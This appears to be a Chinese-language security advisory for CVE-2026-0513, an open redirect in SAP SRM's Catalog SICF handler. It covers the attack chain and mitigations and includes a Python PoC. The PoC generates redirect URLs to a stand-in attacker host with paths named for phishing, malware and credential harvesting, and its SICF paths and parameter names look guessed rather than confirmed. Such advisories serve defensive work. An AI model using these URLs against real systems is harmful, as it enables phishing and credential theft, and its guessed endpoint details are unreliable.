CVE-2026-0513 SAP SRM Catalog SICF Handler开放重定向漏洞

漏洞信息

漏洞编号

CVE-2026-0513

漏洞类型

开放重定向（Open Redirect）

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SAP Supplier Relationship Management (SRM Catalog, SICF Handler)

漏洞概述

CVE-2026-0513是SAP Supplier Relationship Management（供应商关系管理）系统中存在的一个开放重定向安全漏洞。该漏洞位于SRM Catalog的SICF（Servlet Interface）处理器中，由于应用程序未能正确验证和过滤用户提供的重定向URL参数，攻击者可以构造恶意链接，将用户重定向到任意外部网站。未经身份验证的攻击者只需诱骗受害者点击特制的恶意URL，即可实现钓鱼攻击、凭据窃取或恶意软件分发等恶意目的。此漏洞对应用程序的完整性产生较低影响，不影响机密性和可用性。CVSS 3.1基础评分为4.7，属于中等严重程度。

技术细节

该开放重定向漏洞源于SAP SRM Catalog组件的SICF Handler对重定向目标URL缺乏严格的验证机制。攻击者通过在URL参数中注入恶意构造的外部域名，可以绕过应用的安全检查。当应用程序处理重定向请求时，未验证目标URL是否属于可信域名或是否为相对路径，而是直接将用户请求重定向到攻击者控制的网站。攻击者通常利用此漏洞构造钓鱼链接，伪装成合法的SAP系统登录页面，诱导用户输入凭据或下载恶意文件。由于该漏洞无需认证即可利用，且攻击复杂度较低（只需构造特定URL），因此具有较高的实际威胁性。受害者一旦访问恶意链接，其浏览器将自动跳转到攻击者指定的外部站点，可能导致敏感信息泄露或系统被植入恶意软件。

攻击链分析

STEP 1

步骤1

攻击者收集目标信息，确定SAP SRM系统的域名和版本

STEP 2

步骤2

攻击者识别SICF Handler端点及其重定向参数（如redirect、url、returnUrl）

STEP 3

步骤3

攻击者构造恶意URL，将重定向目标指向攻击者控制的钓鱼域名

STEP 4

步骤4

攻击者通过钓鱼邮件、社交工程或恶意网站诱骗受害者点击该恶意链接

STEP 5

步骤5

受害者浏览器访问恶意URL，SAP系统未验证重定向目标，执行跳转

STEP 6

步骤6

受害者浏览器自动重定向到攻击者搭建的钓鱼页面或恶意网站

STEP 7

步骤7

攻击者通过钓鱼页面窃取用户凭据或诱导下载恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-0513 Open Redirect PoC
# Target: SAP Supplier Relationship Management (SRM Catalog)
# Vulnerability: Open Redirect in SICF Handler

import urllib.parse

def generate_open_redirect_poc(base_url, target_domain):
    """
    Generate malicious URL for open redirect attack
    
    Args:
        base_url: Original SAP SRM application URL
        target_domain: Attacker's controlled domain
    
    Returns:
        Malicious redirect URL
    """
    # Common SICF Handler paths in SAP SRM
    sicf_paths = [
        "/sap/bc/ui5_ui5/srm/catalog",
        "/sap/bc/ui2/srm/catalog",
        "/sap/opu/odata/sap/SRM_CATALOG",
        "/sap/bc/srt/scs/sap/SRM_CATALOG"
    ]
    
    malicious_urls = []
    
    for path in sicf_paths:
        # Open redirect via 'redirect' parameter
        redirect_param = urllib.parse.quote(f"https://{target_domain}/phishing")
        malicious_url = f"{base_url}{path}?redirect={redirect_param}"
        malicious_urls.append(malicious_url)
        
        # Open redirect via 'url' parameter
        url_param = urllib.parse.quote(f"https://{target_domain}/malware")
        malicious_url2 = f"{base_url}{path}?url={url_param}"
        malicious_urls.append(malicious_url2)
        
        # Open redirect via 'returnUrl' parameter
        return_param = urllib.parse.quote(f"https://{target_domain}/credential_harvest")
        malicious_url3 = f"{base_url}{path}?returnUrl={return_param}"
        malicious_urls.append(malicious_url3)
    
    return malicious_urls

# Example usage
base_url = "https://sap-company.com"
target_domain = "attacker-controlled-site.com"
pocs = generate_open_redirect_poc(base_url, target_domain)

print("CVE-2026-0513 Open Redirect Attack URLs:")
for i, poc in enumerate(pocs, 1):
    print(f"{i}. {poc}")

# Simple attack scenario:
# 1. Attacker sends email with malicious link to victim
# 2. Victim clicks link thinking it's legitimate SAP portal
# 3. Browser redirects to attacker's phishing site
# 4. Victim enters credentials on fake login page
# 5. Attacker steals credentials

影响范围

SAP Supplier Relationship Management (SRM) - 所有未修复版本

SAP SRM Catalog SICF Handler - 具体版本请参考SAP官方安全公告

防御指南

临时缓解措施

在SAP官方补丁发布之前，可采取以下临时缓解措施：1）通过SAP事务码SICF禁用或限制SRM Catalog相关的SICF服务；2）配置Web应用防火墙（WAF）规则，拦截包含外部域名的重定向请求；3）向用户发布安全公告，提醒不要点击来源不明的SAP系统链接；4）启用URL参数过滤，阻止可疑的重定向参数；5）考虑临时关闭SRM Catalog功能直到完成安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0513
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0513
3 Details https://www.cvedetails.com/cve/CVE-2026-0513/
4 VulDB https://vuldb.com/cve/CVE-2026-0513
5 Link https://me.sap.com/notes/3638716
6 Link https://url.sap/sapsecuritypatchday